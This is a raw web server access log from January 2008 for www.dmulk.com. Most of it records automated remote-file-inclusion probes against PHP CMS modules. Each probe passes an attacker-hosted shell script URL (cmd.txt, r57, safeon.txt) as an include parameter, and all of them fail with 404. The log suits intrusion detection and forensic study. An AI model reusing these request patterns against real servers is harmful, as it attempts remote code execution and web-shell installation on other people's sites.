213.194.149.12 - - [22/Jan/2008:11:54:05 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:11:54:05 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.208.81.132 - - [22/Jan/2008:11:54:42 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.naimaa.com/templates/r00t/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.172.239.6 - - [22/Jan/2008:11:54:48 -0800] "GET /logs/access_071124.log HTTP/1.1" 200 55613 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; bgft; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:11:55:07 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [22/Jan/2008:11:55:12 -0800] "GET /megumi/earrings/?M=A HTTP/1.0" 200 2065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.76.186.87 - - [22/Jan/2008:11:56:57 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [22/Jan/2008:11:57:00 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
131.158.223.4 - - [22/Jan/2008:11:57:15 -0800] "GET /logs/access_071229.log HTTP/1.1" 200 314379 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
64.76.186.87 - - [22/Jan/2008:11:57:32 -0800] "GET /logs/access_071225.log//modules/TotalCalendar/about.php?inc_dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:12:01:28 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.212.130.120 - - [22/Jan/2008:12:02:07 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.212.130.120 - - [22/Jan/2008:12:02:07 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.156.153 - - [22/Jan/2008:12:02:37 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
72.55.156.153 - - [22/Jan/2008:12:02:42 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
217.73.27.10 - - [22/Jan/2008:12:04:53 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=www.freewebs.com/xplproxysx???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.73.27.10 - - [22/Jan/2008:12:04:54 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=www.freewebs.com/xplproxysx???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.73.27.10 - - [22/Jan/2008:12:04:54 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=www.freewebs.com/xplproxysx???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.43 - - [22/Jan/2008:12:05:19 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.155.75 - - [22/Jan/2008:12:05:49 -0800] "GET /logs/access_071229.log/index.php?table=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.155.75 - - [22/Jan/2008:12:05:49 -0800] "GET /index.php?table=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.155.75 - - [22/Jan/2008:12:05:50 -0800] "GET /logs/index.php?table=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
80.87.131.98 - - [22/Jan/2008:12:10:21 -0800] "GET /index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
80.87.131.98 - - [22/Jan/2008:12:10:22 -0800] "GET /logs/index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
208.75.212.136 - - [22/Jan/2008:12:10:32 -0800] "GET /logs/access_071229.log/index.php?table=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.75.212.136 - - [22/Jan/2008:12:10:33 -0800] "GET /index.php?table=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.75.212.136 - - [22/Jan/2008:12:10:33 -0800] "GET /logs/index.php?table=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.45.253 - - [22/Jan/2008:12:10:33 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://direma.at/administrator/modules/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.70.35.179 - - [22/Jan/2008:12:10:48 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:12:12:17 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.19.178.201 - - [22/Jan/2008:12:12:31 -0800] "GET /index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
210.52.223.25 - - [22/Jan/2008:12:12:31 -0800] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.buergerfunk-bochum.de/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.178.201 - - [22/Jan/2008:12:12:32 -0800] "GET /logs/index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
80.87.131.98 - - [22/Jan/2008:12:12:40 -0800] "GET /logs/index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
80.87.131.98 - - [22/Jan/2008:12:12:46 -0800] "GET /index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
211.233.45.253 - - [22/Jan/2008:12:15:09 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://direma.at/administrator/modules/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.45.253 - - [22/Jan/2008:12:15:10 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://direma.at/administrator/modules/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.45.253 - - [22/Jan/2008:12:15:10 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://direma.at/administrator/modules/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.155.75 - - [22/Jan/2008:12:15:21 -0800] "GET /index.php?table=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:12:16:14 -0800] "GET /logs/access_080101.log/akocomments.php?mosConfig_absolute_path=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:12:16:14 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:12:16:15 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.19.178.201 - - [22/Jan/2008:12:16:24 -0800] "GET /index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
84.19.178.201 - - [22/Jan/2008:12:16:24 -0800] "GET /logs/index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:12:16:29 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.35.191.105 - - [22/Jan/2008:12:17:55 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bbb.hostingisfree.com/bbb/chat/appdata/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:12:24:01 -0800] "GET /logs/access_071225.log/index.php?body=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:12:24:01 -0800] "GET /index.php?body=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:12:24:02 -0800] "GET /logs/index.php?body=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:12:24:09 -0800] "GET /logs/access_071225.log/index.php?body=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:12:24:09 -0800] "GET /index.php?body=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:12:24:10 -0800] "GET /logs/index.php?body=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.255.3.70 - - [22/Jan/2008:12:25:05 -0800] "GET //SHELLZ.php//convert/mvcw.php?step=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.21.10 - - [22/Jan/2008:12:29:35 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
80.67.21.10 - - [22/Jan/2008:12:29:35 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:12:29:55 -0800] "GET /logs/access.log/index.php?body=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:12:29:55 -0800] "GET /logs/access.log/index.php?body=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:12:31:34 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:12:31:34 -0800] "GET //skin/zero_vote/error.php?dir=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:12:31:34 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
154.11.98.146 - - [22/Jan/2008:12:33:08 -0800] "GET /bikes/dteel/Mining_Pick.jpg HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=34378" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:12:33:41 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:12:33:50 -0800] "GET /minamijewelry/html/index.html HTTP/1.0" 200 13288 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:12:34:42 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.179.203 - - [22/Jan/2008:12:37:43 -0800] "GET /logs/access_071022.log HTTP/1.0" 200 18527 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.245.164.10 - - [22/Jan/2008:12:38:02 -0800] "GET /logs/access_071203.log///index.php?autoLoadConfig[999][0][autoType]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.164.10 - - [22/Jan/2008:12:38:02 -0800] "GET ///index.php?autoLoadConfig[999][0][autoType]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.164.10 - - [22/Jan/2008:12:38:02 -0800] "GET /logs///index.php?autoLoadConfig[999][0][autoType]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.3.70 - - [22/Jan/2008:12:38:56 -0800] "GET /logs/access_071109.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.3.70 - - [22/Jan/2008:12:38:57 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.3.70 - - [22/Jan/2008:12:38:57 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.3.70 - - [22/Jan/2008:12:38:57 -0800] "GET /logs/access_071030.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.30.221.50 - - [22/Jan/2008:12:39:01 -0800] "GET /logs/access_071109.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.30.221.50 - - [22/Jan/2008:12:39:05 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.30.221.50 - - [22/Jan/2008:12:39:05 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.30.221.50 - - [22/Jan/2008:12:39:06 -0800] "GET /logs/access_071030.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.164.10 - - [22/Jan/2008:12:39:39 -0800] "GET /logs/access_071109.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.164.10 - - [22/Jan/2008:12:39:40 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.164.10 - - [22/Jan/2008:12:39:40 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.164.10 - - [22/Jan/2008:12:39:40 -0800] "GET /logs/access_071030.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.41.212.117 - - [22/Jan/2008:12:40:02 -0800] "GET /logs/access_071109.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.41.212.117 - - [22/Jan/2008:12:40:02 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.41.212.117 - - [22/Jan/2008:12:40:03 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.41.212.117 - - [22/Jan/2008:12:40:03 -0800] "GET /logs/access_071030.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.177.136 - - [22/Jan/2008:12:40:28 -0800] "GET /logs//admin/admin_users.php?phpbb_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.75.177.136 - - [22/Jan/2008:12:40:28 -0800] "GET //admin/admin_users.php?phpbb_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.255.3.70 - - [22/Jan/2008:12:40:57 -0800] "GET /logs/access_071221.log//SHELLZ.php//convert/mvcw.php?step=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.3.70 - - [22/Jan/2008:12:40:58 -0800] "GET /logs//SHELLZ.php//convert/mvcw.php?step=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.41.212.117 - - [22/Jan/2008:12:41:33 -0800] "GET /logs/access_071221.log//SHELLZ.php//convert/mvcw.php?step=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.41.212.117 - - [22/Jan/2008:12:41:33 -0800] "GET //SHELLZ.php//convert/mvcw.php?step=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.41.212.117 - - [22/Jan/2008:12:41:34 -0800] "GET /logs//SHELLZ.php//convert/mvcw.php?step=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.128.200.113 - - [22/Jan/2008:12:42:01 -0800] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.128.200.113 - - [22/Jan/2008:12:42:03 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.128.200.113 - - [22/Jan/2008:12:42:04 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.35.191.105 - - [22/Jan/2008:12:42:14 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bbb.hostingisfree.com/bbb/chat/appdata/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.35.191.105 - - [22/Jan/2008:12:42:14 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bbb.hostingisfree.com/bbb/chat/appdata/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
71.236.230.52 - - [22/Jan/2008:12:42:35 -0800] "GET /logs/access_071109.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.236.230.52 - - [22/Jan/2008:12:42:35 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.236.230.52 - - [22/Jan/2008:12:42:35 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.236.230.52 - - [22/Jan/2008:12:42:36 -0800] "GET /logs/access_071030.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.29.32 - - [22/Jan/2008:12:42:51 -0800] "GET /?N=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
84.41.212.117 - - [22/Jan/2008:12:43:41 -0800] "GET /logs/access_071203.log///index.php?autoLoadConfig[999][0][autoType]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.164.10 - - [22/Jan/2008:12:43:42 -0800] "GET /logs/access_071221.log///index.php?autoLoadConfig[999][0][autoType]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.41.212.117 - - [22/Jan/2008:12:43:42 -0800] "GET ///index.php?autoLoadConfig[999][0][autoType]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.41.212.117 - - [22/Jan/2008:12:43:42 -0800] "GET /logs///index.php?autoLoadConfig[999][0][autoType]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.41.212.117 - - [22/Jan/2008:12:43:45 -0800] "GET /logs/access_071224.log//SHELLZ.php//convert/mvcw.php?step=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.255.3.70 - - [22/Jan/2008:12:44:30 -0800] "GET //index.php?option=com_puarcade&task=cat_view&gid=&mosConfig_absolute_path=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.35.191.105 - - [22/Jan/2008:12:44:48 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bbb.hostingisfree.com/bbb/chat/appdata/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
193.205.186.244 - - [22/Jan/2008:12:46:26 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.pubmailing.com/r57?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [22/Jan/2008:12:46:26 -0800] "GET //skin/zero_vote/error.php?dir=http://www.pubmailing.com/r57?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [22/Jan/2008:12:46:26 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.pubmailing.com/r57?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [22/Jan/2008:12:46:30 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.pubmailing.com/r57?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
